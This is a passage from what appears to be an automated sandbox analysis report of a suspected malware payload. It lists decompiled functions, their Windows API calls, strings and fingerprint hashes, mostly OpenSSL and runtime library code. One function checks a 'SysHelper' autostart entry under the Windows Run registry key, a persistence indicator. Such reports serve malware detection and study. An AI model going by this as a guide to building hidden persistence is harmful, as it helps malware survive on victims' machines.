                                                                                                        • GetLastError.KERNEL32 ref: 00F21915
                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00F21932
                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F21941
                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F21948
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00F21956
                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00F21962
                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00F21974
                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00F2198B
                                                                                                        • lstrcatW.KERNEL32(00000000,01010260), ref: 00F21993
                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00F21999
                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00F219A3
                                                                                                        • _memset.LIBCMT ref: 00F219B8
                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 00F219DC
                                                                                                          • Part of subcall function 00F22BA0: lstrlenW.KERNEL32(?), ref: 00F22BC9
                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F21A01
                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00F21A04
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                        • String ID: failed with error
                                                                                                        • API String ID: 4182478520-946485432
                                                                                                        • Opcode ID: 9ca23155c8611b8c96a257da9efc262019f6b3a18b265f62b4748070803dd852
                                                                                                        • Instruction ID: 350c1437f10f977c02b2b9c5ad1b9ae6f474780ac3937de60df7d3623d789dcc
                                                                                                        • Opcode Fuzzy Hash: 9ca23155c8611b8c96a257da9efc262019f6b3a18b265f62b4748070803dd852
                                                                                                        • Instruction Fuzzy Hash: 4D210732A4122DB7EB116BA09C4AFAE3B79EF85B11F100016FA05B6190DE781D41FBE5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F922E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F649A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00F64B72), ref: 00F649C7
                                                                                                          • Part of subcall function 00F649A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00F649D7
                                                                                                          • Part of subcall function 00F649A0: GetDesktopWindow.USER32 ref: 00F649FB
                                                                                                          • Part of subcall function 00F649A0: GetProcessWindowStation.USER32(?,00F64B72), ref: 00F64A01
                                                                                                          • Part of subcall function 00F649A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00F64B72), ref: 00F64A1C
                                                                                                          • Part of subcall function 00F649A0: GetLastError.KERNEL32(?,00F64B72), ref: 00F64A2A
                                                                                                          • Part of subcall function 00F649A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00F64B72), ref: 00F64A65
                                                                                                          • Part of subcall function 00F649A0: _wcsstr.LIBCMT ref: 00F64A8A
                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F92316
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00F92323
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00F92338
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00F92341
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 00F9234E
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F9235C
                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00F9236E
                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 00F923CA
                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 00F923D6
                                                                                                        • SelectObject.GDI32(?,?), ref: 00F92436
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F9243D
                                                                                                        • DeleteDC.GDI32(?), ref: 00F9244A
                                                                                                        • DeleteDC.GDI32(?), ref: 00F92450
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                        • API String ID: 151064509-1805842116
                                                                                                        • Opcode ID: b46dec1571ea6ea4775c63049f26de263516083ef778c430e556c11e4b91db76
                                                                                                        • Instruction ID: 0d7ed1242274a76aba30caba8daeb12a13f53ab1c34ea6166f3009310c9bb19b
                                                                                                        • Opcode Fuzzy Hash: b46dec1571ea6ea4775c63049f26de263516083ef778c430e556c11e4b91db76
                                                                                                        • Instruction Fuzzy Hash: EC41D631944304ABE710AB759C4AF2FBBF9FF89710F00051AFA94D62A1D7769800DBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F735B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _strncmp
                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                        • API String ID: 909875538-2733969777
                                                                                                        • Opcode ID: 232fadda3e47253bf186cebb8e3492e4838a982f072df8b207b5ef066dc1c321
                                                                                                        • Instruction ID: 3ad1735bb235c68e2ba4925fc72fe9eb706752ac004ed8554179e8152b7979e6
                                                                                                        • Opcode Fuzzy Hash: 232fadda3e47253bf186cebb8e3492e4838a982f072df8b207b5ef066dc1c321
                                                                                                        • Instruction Fuzzy Hash: 20F1E872A08341BBE721EA24DC42F5B77D89F55714F04482AFE8CD7282E674DA09B793
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F35A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1503006713-0
                                                                                                        • Opcode ID: c1ff839586c6294d4ba86e8ea4cf07bdbbb4f7a6c2a0984b3f108c57cdc4a136
                                                                                                        • Instruction ID: e9cb9cce1623197742303412616093f997bc08bf43e6866a0c50b5bd5cd345b6
                                                                                                        • Opcode Fuzzy Hash: c1ff839586c6294d4ba86e8ea4cf07bdbbb4f7a6c2a0984b3f108c57cdc4a136
                                                                                                        • Instruction Fuzzy Hash: FD218476509A05EBEB217F65DC02E0FBBD4DFC1FB0F14442AF48496191EE699810FB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F37B21 Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DecodePointer.KERNEL32 ref: 00F37B29
                                                                                                        • _free.LIBCMT ref: 00F37B42
                                                                                                          • Part of subcall function 00F30BED: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3507F,00000000,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30C01
                                                                                                          • Part of subcall function 00F30BED: GetLastError.KERNEL32(00000000,?,00F3507F,00000000,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30C13
                                                                                                        • _free.LIBCMT ref: 00F37B55
                                                                                                        • _free.LIBCMT ref: 00F37B73
                                                                                                        • _free.LIBCMT ref: 00F37B85
                                                                                                        • _free.LIBCMT ref: 00F37B96
                                                                                                        • _free.LIBCMT ref: 00F37BA1
                                                                                                        • _free.LIBCMT ref: 00F37BC5
                                                                                                        • EncodePointer.KERNEL32(0084C698), ref: 00F37BCC
                                                                                                        • _free.LIBCMT ref: 00F37BE1
                                                                                                        • _free.LIBCMT ref: 00F37BF7
                                                                                                        • _free.LIBCMT ref: 00F37C1F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 3064303923-0
                                                                                                        • Opcode ID: 2ba2e7214999c4a92e6f044d206038bac7ef0c4fe9051adff1685b497b34762e
                                                                                                        • Instruction ID: c312eb09095d4551ab8565c947c6113b549d8ce2162e312941319d55b9e89563
                                                                                                        • Opcode Fuzzy Hash: 2ba2e7214999c4a92e6f044d206038bac7ef0c4fe9051adff1685b497b34762e
                                                                                                        • Instruction Fuzzy Hash: 47216DB19093949BCA316F55BC80919BB64BB84374B64403AF884A735CCF7E6840EF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F21B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F21BB0
                                                                                                        • CoCreateInstance.OLE32(00FDE908,00000000,00000001,00FDD568,00000000), ref: 00F21BC8
                                                                                                        • CoUninitialize.OLE32 ref: 00F21BD0
                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00F21C12
                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00F21C22
                                                                                                        • lstrcatW.KERNEL32(?,01010050), ref: 00F21C3A
                                                                                                        • lstrcatW.KERNEL32(?), ref: 00F21C44
                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00F21C68
                                                                                                        • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00F21C7A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                        • String ID: \shell32.dll
                                                                                                        • API String ID: 679253221-3783449302
                                                                                                        • Opcode ID: f6e248e342b9b963de36c9bb4af6f989498c5211f946b3813b305cc201bb4834
                                                                                                        • Instruction ID: 30c74240205f41e6d46313149c69317219a2e44cb95582b786fb5713fd057c2e
                                                                                                        • Opcode Fuzzy Hash: f6e248e342b9b963de36c9bb4af6f989498c5211f946b3813b305cc201bb4834
                                                                                                        • Instruction Fuzzy Hash: 58415A75A8021DAFDB20CBA4DC88FEA7BBDAF48704F004599B505EB190D6B1AA45DB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F649A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00F64B72), ref: 00F649C7
                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00F649D7
                                                                                                        • GetDesktopWindow.USER32 ref: 00F649FB
                                                                                                        • GetProcessWindowStation.USER32(?,00F64B72), ref: 00F64A01
                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00F64B72), ref: 00F64A1C
                                                                                                        • GetLastError.KERNEL32(?,00F64B72), ref: 00F64A2A
                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00F64B72), ref: 00F64A65
                                                                                                        • _wcsstr.LIBCMT ref: 00F64A8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                        • API String ID: 2112994598-1672312481
                                                                                                        • Opcode ID: d154515cbb8af3500c0ffb0e143cb3951e8303e5c3ec2256b019218e8c83b4f4
                                                                                                        • Instruction ID: d12527e4c9df7372a083a5fb36762317bc3eded651f8df3ce0e17ca1b69cceb0
                                                                                                        • Opcode Fuzzy Hash: d154515cbb8af3500c0ffb0e143cb3951e8303e5c3ec2256b019218e8c83b4f4
                                                                                                        • Instruction Fuzzy Hash: F431A631A40109ABDB20EFF9EC46AAE77B9EF44730F104256E856D71D0EB35A900EB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F64AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F4,00F64C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00F6480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00F61D37,00000000,00F1CDAE,00000001,00000001), ref: 00F64AFA
                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00F64B05
                                                                                                        • __vfwprintf_p.LIBCMT ref: 00F64B27
                                                                                                          • Part of subcall function 00F3BDCC: _vfprintf_helper.LIBCMT ref: 00F3BDDF
                                                                                                        • vswprintf.LIBCMT ref: 00F64B5D
                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00F64B7E
                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00F64BA2
                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00F64BA9
                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00F64BD3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                        • API String ID: 277090408-1348657634
                                                                                                        • Opcode ID: f8c5dff16d75d4337e0d3a346ff505011d89b41095672fc8853e235ed1c39f7b
                                                                                                        • Instruction ID: 93c3aa9506c13b864dddd1dbbf36cdf5fb464dc2e1000ac5dd6295d8db3a6bb0
                                                                                                        • Opcode Fuzzy Hash: f8c5dff16d75d4337e0d3a346ff505011d89b41095672fc8853e235ed1c39f7b
                                                                                                        • Instruction Fuzzy Hash: C121D771648345ABE730AB70CC4BFEF7799AF88710F44481AB699C61D0EAB99440E793
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F22360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00F22389
                                                                                                        • _memset.LIBCMT ref: 00F223B6
                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 00F223DE
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F223E7
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F223F4
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00F223FF
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2240E
                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 00F22422
                                                                                                        Strings
                                                                                                        • SysHelper, xrefs: 00F223D6
                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00F2237F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                        • API String ID: 122392481-4165002228
                                                                                                        • Opcode ID: 6e36d34404e1cab332362074d61e52802245c2ce6a3615e80f6be4c1f38420fe
                                                                                                        • Instruction ID: 01b89c7d327f8ae033cc4b462486e54cdd87e573019fbe052350716fa5590393
                                                                                                        • Opcode Fuzzy Hash: 6e36d34404e1cab332362074d61e52802245c2ce6a3615e80f6be4c1f38420fe
                                                                                                        • Instruction Fuzzy Hash: 77112C7194021DBBDF10DFA0DC49FEE77BDBB04705F0045A6B549E2151DBB45A84EB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F35B6E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
